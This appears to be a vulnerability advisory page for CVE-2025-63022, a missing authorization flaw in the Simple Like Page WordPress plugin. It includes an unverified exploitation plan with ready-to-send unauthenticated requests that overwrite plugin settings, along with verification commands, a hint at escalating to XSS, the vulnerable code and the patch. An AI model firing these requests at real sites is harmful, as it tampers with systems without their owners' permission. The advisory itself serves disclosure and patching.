CVE-2025-63022

Simple Like Page <= 1.5.3 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
2.0.0
Patched in
77d
Time to patch

Description

The Simple Like Page plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.5.3
PublishedDecember 31, 2025
Last updatedMarch 17, 2026
Affected pluginsimple-facebook-plugin

What Changed in the Fix

Changes introduced in v2.0.0

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan - CVE-2025-63022 ## 1. Vulnerability Summary The **Simple Like Page Plugin** (up to version 1.5.3) is vulnerable to **Missing Authorization** and **Insecure CSRF protection**. The plugin registers several functions on the `admin_init` hook that perform sensitive operati…

Show full research plan

Exploitation Research Plan - CVE-2025-63022

1. Vulnerability Summary

The Simple Like Page Plugin (up to version 1.5.3) is vulnerable to Missing Authorization and Insecure CSRF protection. The plugin registers several functions on the admin_init hook that perform sensitive operations (updating plugin options) without verifying the user's identity (capability check) or the request's authenticity (nonce check). Since admin_init is triggered during any request to /wp-admin/admin-ajax.php, even by unauthenticated users, an attacker can modify plugin settings remotely.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php (or any endpoint that triggers admin_init).
  • Target Functions: SFPlugin::saveOptions and SFPlugin::ignoreNotices.
  • Authentication: None (Unauthenticated).
  • Vulnerable Parameters:
    • sfp_options_saved (Trigger for saveOptions)
    • locale (The value to be saved into the database)
    • sfp_ignore_notice (Trigger for ignoreNotices)

3. Code Flow

  1. Entry Point: An HTTP request is sent to /wp-admin/admin-ajax.php.
  2. Hook Execution: WordPress initializes and fires the admin_init hook.
  3. Plugin Callback: The SFPlugin class has registered saveOptions and ignoreNotices to this hook in simple-facebook-plugin.php:
    add_action( 'admin_init', array( $this, 'saveOptions' ) );
    add_action( 'admin_init', array( $this, 'ignoreNotices' ) );
    
  4. Vulnerable Logic (saveOptions):
    public function saveOptions() {
        if ( isset( $_POST['sfp_options_saved'] ) ) { // Trigger check
            $options = $this->getPluginOptions();
            $options['locale'] = strip_tags( $_POST['locale'] ); // Input
            update_option( $this->optionName, $options ); // Sink
        }
    }
    
    The function lacks current_user_can() and check_admin_referer(), allowing any request with the sfp_options_saved POST parameter to update the simple_facebook_plugin_options option.

4. Nonce Acquisition Strategy

No nonce is required. The vulnerable functions saveOptions() and ignoreNotices() do not call check_admin_referer() or wp_verify_nonce(). They rely solely on the presence of specific parameters (sfp_options_saved or sfp_ignore_notice).

5. Exploitation Strategy

The goal is to modify the locale setting of the plugin, which is stored in the simple_facebook_plugin_options option.

Step 1: Modify Plugin Settings (Locale)

  • Tool: http_request
  • Method: POST
  • URL: {{BASE_URL}}/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: sfp_options_saved=1&locale=exploit_test_locale

Step 2: Disable Admin Notices

  • Tool: http_request
  • Method: GET
  • URL: {{BASE_URL}}/wp-admin/admin-ajax.php?sfp_ignore_notice=0

6. Test Data Setup

  1. Environment: A standard WordPress installation with Simple Like Page Plugin v1.5.3 installed and activated.
  2. Initial State:
    • Check the current option value: wp option get simple_facebook_plugin_options --format=json
    • Default should be {"locale":"en_US"}.

7. Expected Results

  • The server will likely return a 0 or 200 OK response (typical for admin-ajax.php when no specific action is handled after admin_init).
  • The WordPress database option simple_facebook_plugin_options will be updated with the new locale value.
  • The WordPress database option sfp_ignore_notice will be set to true.

8. Verification Steps

After performing the HTTP requests, verify the changes using WP-CLI:

  1. Verify Locale Change:

    wp option get simple_facebook_plugin_options --format=json
    

    Expected output: {"locale":"exploit_test_locale"}

  2. Verify Notice Ignored:

    wp option get sfp_ignore_notice
    

    Expected output: true

9. Alternative Approaches

If /wp-admin/admin-ajax.php is restricted or behaves unexpectedly, the same attack can be performed against /wp-admin/admin-post.php or simply the WordPress admin dashboard root /wp-admin/index.php, as admin_init fires on all of these for any user, and the plugin code does not check if the user is actually on a settings page.

Refined Locale Payload for XSS (Optional):
While the CVE is for Missing Authorization, the locale value is later reflected in views/view-page-plugin.php inside a <script> tag:

js.src = "//connect.facebook.net/<?php echo esc_js($locale); ?>/all.js#xfbml=1";

An attacker could attempt to break out of the URL context (though esc_js and strip_tags provide some protection) to escalate this to Unauthenticated XSS. However, for this PoC, modifying the setting is sufficient to demonstrate the Missing Authorization vulnerability.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Simple Like Page plugin for WordPress is vulnerable to unauthorized modification of settings and notice dismissal due to missing capability and nonce checks in the saveOptions and ignoreNotices functions. These functions are hooked to admin_init, which can be triggered by unauthenticated users through endpoints like /wp-admin/admin-ajax.php.

Vulnerable Code

// simple-facebook-plugin.php (line ~89)
add_action( 'admin_init', array( $this, 'saveOptions' ) );
add_action( 'admin_init', array( $this, 'ignoreNotices' ) );

---

// simple-facebook-plugin.php
public function saveOptions() {
    if ( isset( $_POST['sfp_options_saved'] ) ) {
        $options = $this->getPluginOptions();
        $options['locale'] = strip_tags( $_POST['locale'] );
        update_option( $this->optionName, $options );
    }
}

Security Fix

--- a/simple-facebook-plugin.php
+++ b/simple-facebook-plugin.php
@@ -265,6 +265,10 @@
 		public function saveOptions() {
 			if ( isset( $_POST['sfp_options_saved'] ) ) {
+				if ( ! current_user_can( 'manage_options' ) ) {
+					return;
+				}
+				check_admin_referer( 'sfp_save_options_action', 'sfp_save_options_nonce' );
 				$options = $this->getPluginOptions();
 				$options['locale'] = strip_tags( $_POST['locale'] );
 				update_option( $this->optionName, $options );
 			}
 		}
 
 		public function ignoreNotices() {
-			if ( isset( $_GET['sfp_ignore_notice'] ) ) {
+			if ( isset( $_GET['sfp_ignore_notice'] ) && current_user_can( 'manage_options' ) ) {
 				update_option( 'sfp_ignore_notice', true );
 			}

Exploit Outline

The vulnerability is exploited by sending a crafted HTTP request to any WordPress administrative endpoint (such as /wp-admin/admin-ajax.php) which triggers the admin_init hook. Because the plugin does not verify if the user has administrative privileges or if the request contains a valid security nonce, an unauthenticated attacker can supply the 'sfp_options_saved' POST parameter along with a 'locale' value to overwrite the plugin's configuration in the database. Similarly, the 'sfp_ignore_notice' GET parameter can be used to manipulate plugin notices.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.